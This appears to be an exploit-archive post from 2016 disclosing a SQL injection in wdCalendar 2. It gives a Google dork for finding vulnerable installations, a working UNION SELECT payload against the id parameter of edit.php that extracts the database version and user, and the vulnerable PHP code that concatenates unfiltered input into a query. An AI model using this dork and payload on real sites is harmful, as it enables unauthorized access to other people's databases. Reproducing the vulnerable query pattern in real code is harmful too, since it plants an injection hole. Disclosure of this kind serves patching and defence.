Home / os / winmobile

wdCalendar 2 SQL Injection

Posted on 13 September 2016

# Exploit Title: wdcalendar version 2 sql injection vulnerability # Google Dork: allinurl:"wdcalendar/edit.php" # Date: 12/09/2016 # Exploit Author: Alfonso Castillo Angel # Software Link: https://github.com/ronisaha/wdCalendar # Version: Version 2 # Tested on: Windows 7 ultimate # Category: webapps * Affected file -> edit.php and edit.db.php * Exploit -> http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9-- * Vulnerable code: function getCalendarByRange($id){ try{ $db = new DBConnection(); $db->getConnection(); $sql = "select * from `jqcalendar` where `id` = " . $id; //the variable is not filtered properly $handle = mysql_query($sql); //echo $sql; $row = mysql_fetch_object($handle); }catch(Exception $e){ } return $row; } if($_GET["id"]){ $event = getCalendarByRange($_GET["id"]); //the variable is not filtered properly

 

TOP